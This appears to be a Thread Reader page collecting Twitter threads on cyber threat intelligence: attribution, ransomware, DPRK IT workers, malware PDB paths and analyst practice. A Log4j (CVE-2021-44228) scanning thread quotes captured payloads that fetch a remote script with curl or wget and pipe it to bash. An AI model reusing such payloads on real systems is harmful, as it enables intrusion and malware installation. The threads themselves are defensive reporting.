Discover and read the best of Twitter Threads about #ThreatIntel

Most recents (24)

#ICYMI, here's a #threatintel related🧵👇 by me on @USTreasury advisory on DPRK IT workers' attempts to obtain employment while posing as non-North Korean nationals:… (1/?)
DPRK IT workers "engage in a wide range of IT dev work, such as: mobile & web-based apps, virtual currency exchange platforms & digital coins. Some
designed virtual currency exchanges or created analytic tools/apps for virtual currency traders & marketed their products." (2/?)
This reminds me, for example, of Marine Chain Token: (…;…), #AppleJeus (…) and, more recently, #TraderTraitor (…). #HIDDENCOBRA/#APT38 loves loves loves their crypto (3/?)
Read 14 tweets
Visualizing #cybersecurity concepts can be a great way to learn more about specific tools, methodologies, and techniques! Here is a thread that shows 6 useful infographics on threat intelligence and related topics!🧵👇#infosec #threatintel

1⃣ - Practical Threat Intel
2⃣ - Tactics, Techniques and Procedures is an important concept to understand when you are working on threat intelligence to understand the capabilities of threat actors! 🤓 #Infosec #ttp
3⃣ - Mitre ATT&CK Matrix is became one of the references to classify and categorize attackers' TTPs! ☠️ #cybersecurity
Read 8 tweets
Many #threatintel teams likely have a new requirement to provide daily (or more!) updates on the UA/RU war to include cyber threat activity AND factors like sanctions, military developments, etc. This is not easy. Here are my ✅ tips for surviving "intel update fatigue" 🧵.
✅ Reduce, filter sources

There is too much information--much of it unconfirmed--from disparate sources. Stick to news from reliable and official sources (national CERTs, your intel providers, AP, Reuters, BBC, etc.) who have done the vetting for you.
✅ Change your dissemination habits; prioritize speed

If your team typically disseminates information via traditional reports (presumably over email), consider creating a dedicated chat channel with your security and business partners exclusively for fast updates...
Read 9 tweets
My parents have been looking to buy an RV and this evening my Mom found an oddly cheap RV on an "RV Trader" website. I'm pretty sure it's a scam - come with me while I investigate and use some #OSINT along the way! #ThreatIntel #SCAM #infosec
The link my mom sent was for a 2005 Airstream Bambi, for 9,800 dollars - wait, that seems way too cheap! Image
First red flag, the website doesn't seem to give you any need to click "request more info" which prompts for your contact information. Image
Read 12 tweets
Mass scanning activity detected from multiple hosts checking for servers using Apache Log4j (Java logging library) vulnerable to remote code execution (…).

Query our API for "tags=CVE-2021-44228" for source IP addresses and other IOCs. #threatintel
Example CVE-2021-44228 payload:

(curl -s||wget -q -O-|bash

Source IP: (🇷🇺) ImageImage
Example CVE-2021-44228 payload (decoded):
wget;chmod +x lh[.]sh;./

DDoS malware (…)

Source IP: (🇧🇩/🇳🇱) ImageImage
Read 41 tweets
Today I started compiling a list of the #twitter accounts of companies that develop useful #OSINT tools.…

In this thread🧵, I'll talk about the project behind each account on the this list.
@haveibeenpwned Check if your email or phone is in a data breach

@duckduckgo Privacy search engine

@webintmaster Companies research tool…
@Fear_the_Foca tool used to find metadata and hidden information in documents

@SpyseHQ internet access search engine

@sploitus_com tools & exploits search engine
Read 28 tweets
In light of the recent #SupplyChain attack on @KaseyaCorp by #REvil, it is worth paying attention to decoder[.]re included within the ransom notes, used additionally to 'mirror' in TOR network. #Ransomware #Cybersecurity #ThreatIntel #ThreatHunting #Malware Image
Similar to decryptor[.]cc and decryptor[.]top in previous #REvil/#Sodinokibi versions, decoder[.]re is used to grant the victims access to the threat actors WEB-site for further negotiations should their connection be limited via #TOR. Image
To access the page in WWW or TOR - the victim needs to provide a valid UID (e.g. "9343467A488841AC") ImageImage
Read 11 tweets
ICYMI, @PwC_UK’s 2020 #threatintel Year in Retrospect report is out now! All team contributed but h/t to @KystleM_Reid! :fire: You can check it out here: In this thread, I will summarise some of what I thought were key findings: 🧵👇 1/n
#Ransomware has become the most significant cyber security threat faced by organisations, irrespective of industry/location. TTPs have pivoted to mass data exfiltration prior to encryption, along with leaks & extortion. S/o to @andyp346 for all your work countering this.🙏 2/n
In 2020, 86% of the incidents that PwC’s Incident Response team responded to were attributable to cyber criminals. 79% of leaks happened in 2nd half of 2020. Our data sees Manufacturing, TMT, & Professional Services most impacted. 3/n
Read 19 tweets
I'm generally a pretty positive person, but it's Festivus, so let's blow off some steam and air our #threatintel grievances. Threat intel feeds are just data feeds, they're not threat intel. Please stop naming groups after malware, it's confusing AF.
Nation states are not countries. CC @cnoanalysis…
If you use fear, uncertainty, and doubt to sell things, you are a GRINCH and please stop.
Read 19 tweets
A thread on bad analysis. When #ThreatIntel analysts want to show off their Foreign Policy and Economist subscription status after reading the Russian foreign policy Wikipedia page /n #threatintelligence #cybersecurity #infosec Image
Most analysts who are "doing attribution" aren't doing good cyber threat intelligence, they're doing poor foreign policy analysis
They neither have neither the data nor the expertise to make even a moderately confident statement on attribution
Read 12 tweets
My paper on “Public Attribution of Cyber Intrusions” was published in the Journal of Cybersecurity (@OUPAcademic). It's open access so everyone can have a read. I summarize the main insights in the thread below:…
Drawing on the intelligence studies literature, I argue that public attribution is employed to shape the “rules of the game” and thereby shape the normative and operational environment for cyber operations.
I split attribution into sense-making and meaning-making processes: sense-making process refers to the knowledge-generation process that establishes what happened, the meaning-making process to deliberate actions that influence how others interpret a particular cyber intrusion
Read 13 tweets
Sunday's fun fact on inferences:
Arthur Conan Doyle's fictional character "Sherlock Holmes" is based on his real-life professor under whom he studied medicine,Dr. Joseph Bell.

"It is most certainly to you that I owe Sherlock Holmes and though in the stories I have the advantage
...of being able to place Sherlock in all sorts of dramatic positions, I do not think his analytical work is in the least exaggeration of some effects which I have seen you produce in the outpatient ward"
wrote Conan Doyle in a letter to Dr. Bell.
Apparently, other than his medical education, Dr. Bell was also very knowledgeable in other areas such as geography and the cultures, the dialects, patterns of speech and behavior, the army, and more. He was also very observant.
Read 11 tweets
False flag operations are very rare because they're risky and the blowback effects are bad. Interestingly, the risks increase the more "important" you are so the most powerful countries are less likely to conduct FF ops. /1 #infosec #cybersecurity #ThreatIntel
Traditional covert and clandestine operations are cheaper, less risky, and more likely to succeed than false flag ops. Importantly, not all attempts to redirect blame is a false flag but just considered standard covert ops. /2
False flags are also generally misunderstood and confused. For example, using Russian as an English speaker in malware is, by itself, not a false flag but rather just considered good covert practice. It doesn't attempt to place blame but just conceal the operators better. /3
Read 5 tweets
A common ask: why don't you update the Diamond Model paper with newer examples? No. I like to teach the earlier papers to imbue history into infosec. We're surrounded by the new and the "today" - I want to give space to what came before. #infosec #cybersecurity #ThreatIntel
It's important in #infosec to be a student of history because you will be able to scale. There may be 1.5M new threats today, but they're just variations on 3 threats from a decade ago. You can now solve the better #cybersecurity problems.
So, in my courses I don't teach the new to make it "relevant." I teach the old to expose students who likely have never read them and provide additional insight they would have lacked with only the "newest."
Read 3 tweets
Significant threat actors, their recent histories, and any noteworthy changes in 2019 are chronicled here by @PwC_UK #threatintel @smoothimpact @pewpew_lazors @cyberoverdrive #CyberSecurity…
From the report, the targets of #cybercrime and the preponderance of financial motivations #ThreatIntel
@PwC #threatintel team issued 221 reports covering these sectors and threat actor locations in 2019
Read 4 tweets
Key points from my “Lessons from the world's leading cyber threat intelligence (CTI) programs” talk at @gcfriyadh in Riyadh. Video will be shared soon. Talking points aren’t ideal for Twitter but I’ll give it a go [1/24] #ThreatIntel #CyberThreats
@gcfriyadh A CTI program is all about reducing risk for an orgs. Risk = probability x impact. CTI about understanding the internal and external factors that impact probability + impact of risks so decisions can be made that reduce risk [2/24]
@gcfriyadh CTI by definition is threat focused. A threat is a person/group with a motivation, intent and a way of working (TTPs). Malware isn’t a threat, the person using it is. Therefore a CTI program tracks threats being people/groups over time [3/24]
Read 24 tweets
🆕 Microsoft.Workflow.Compiler sample with low VT detection!
1⃣C:\ProgramData\ccm_deploy.xml 🧐
MD5 fb98cddfa2e13334989d27d1b5b7cdda
VT (0/56):…
2⃣Loads C:\ProgramData\package.xml
MD5 a916ca1d57d9c3b2627907ab68a264fe
VT (1/58):…
[1/4] Image
I uploaded both to @virusbay_io:…

and the extracted payload to @anyrun_app:…

Injection Target Process = %ProgramFiles%\Internet Explorer\iexplore.exe
PPID Spoof Parent = True
PPID Spoof Process = explorer
Returned true
[2/4] Image
@virusbay_io @anyrun_app More info on @mattifestation's method:
1⃣ My favorite implementation uploaded publicly is this Excel file (probably authored by @egyed_laszlo):
2⃣ The first workflow VT sample uploaded was ~1 year ago:

^plus background & links
Read 12 tweets
🆕 🔥 Research on PDB Paths from @stvemillertime:…
#DFIR primer & exploration of these wonderful artifacts.
Followed by a survey of malware PDB conventions, PDB anomalies, attacker mistakes. All with attribution, including Western gov.

THREAD (1/n) ImageImageImageImage
Includes considerations for #threatintel shops, red teams/operators, and weaknesses in PDB paths.

Blog also has: the most malware code families and threat groups we've ever published, some spicy groups, and some light swearing (malware devs are potty mouths) #SwearEngine

2/n ImageImage
I love that @stvemillertime surfaced a bunch of strange PDB path anomalies and dug in with @mikesiko's #FLARE team to get to ground truth & replicate the artifact.…
Where my #DFIR followers at?
❓ Curious if you've found other anomalies not listed?
3/n ImageImage
Read 5 tweets
Someone's trying to backdoor "hexcalc.exe" from GitHub and not doing a great job. Here's a quick exploration of the VT tester's 6 files, the corresponding PDB anomalies, PS1 & Cobalt Strike shellcode, and Yara #hunting rules.

Thread 1/n
The first file tested by the VT account is hexcalc.exe
PDB: D:\codes\WinHexCalc\Release\hexcalc.pdb

This led me to search for the original (shady) project from Github:…
and this indeed contains this initial hexcalc.exe

They attempt to backdoor the file 4 different times with PS1 shellcode, uploading all to VT:
PDB: F:\Devel\WinHexCalc-master\Release\hexcalc.pdb
Read 9 tweets
Only about two months later than I originally planned, but here we go. I'll summarise areas we are hiring into in the thread 👇, along with a steer on experience and location where possible (all UK, but happy to make introductions elsewhere).
We have space for a mix of junior and experienced folks in most roles, and there is also a mix of location and partial remote working options depending on the role, so please DM to ask clarification questions or to ask about applying :) A little background on the team:
Cyber Threat Operations is PwC's front-line technical security services group, responsible for a portfolio of blue & red team services to global clients. Blue includes subscription & bespoke #threatintel & research services, short-term & managed endpoint/network threat hunting,
Read 18 tweets
#threatintel thread! The other week, I rendered a high confidence assessment related to malicious activity that I judged was targeting my organization's customers with intent to gain access to our proprietary content. Turns out I was TOTALLY WRONG (1/x)
The activity I THOUGHT was malicious was actually benign and completely expected. Reflecting on the analysis, I realized I fell victim to CONFIRMATION BIAS and FAULTY ASSUMPTIONS. I thought I was immune to these #threatintel phenomena, but I'm not (2/x)
First, I didn't fully understand what I was looking at: what normal customer-to-org interactions look like (authentication). This led to FAULTY ASSUMPTIONS about the nature of the activity I was examining. Boy did it look phishy! There was no way it was legitimate! (3/x)
Read 14 tweets
Although #FIN10 achieved some success targeting the 🇨🇦 casino and mining industry, @FireEye hasn't discussed the actor much since the June, 2017 blog article…, because, well… the techniques are a bit abecedarian. (h/t
FIN10 has gone from targeting those industries, stealing PII and extorting victims for BTC, to posting particularly lame, decimal encoded phishing lures to Canadian stock market forums, directing victims to EMPIRE downloads. Decimal encoded URLs are a consistent FIN10 TTP.
To lend some legitimacy to the phishing lures, FIN10 registers masquerade domains and establishes websites using scrapped source code from legitimate domains. #trashtics
Read 9 tweets
I’m a proponent of writing things down. As #threatintel analysts, a big part of our job is recognizing patterns and making connections. But sometimes, we don’t see the connections. Our brains can’t recall as much information as we think they can (1/x).
This is why it’s imperative to document and memorialize your knowledge. Use your IOC database, your commercial TIP, OneNote, Excel, Wiki, IR ticketing system, whatever you have to capture artifacts, IOC, notes (2/x).
Tag your data (hopefully you have a consistent tagging scheme); organize it; capture enrichment data and attributes that may allow for future correlation. Does this take extra time? Is it annoying sometimes in the face of an active campaign or IR operations? You bet (3/x).
Read 9 tweets
OVERRULED: Here's our take on outmaneuvering a potentially destructive adversary…
We talk compromise, RULER, and links to APT33.
Infosec Twitter suggests they dropped #SHAMOON 💥

Shout-out to co-authors: @QW5kcmV3 @_gackerman_ @a_tweeter_user @WylieNewmark
If you liked this part about our threat similarity engine; I have a confession: that is CYBER #machinelearning!

Designed by @BarryV & Nalani F.
Studied & prototyped by our data scientist @secbern.

Learn more here 📺: (it's not officially called APTinder)
If you like Operational Timelines, #AdversaryPursuit has you covered. We're including them in blogs because it's how we operate & it improves #threatintel sharing. Thx @QW5kcmV3

🖼️ #1: Suspected #APT33 ⏲️…
🖼️ #2: Suspected #APT29 ⏲️…
Read 4 tweets

Related hashtags

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3.00/month or $30.00/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!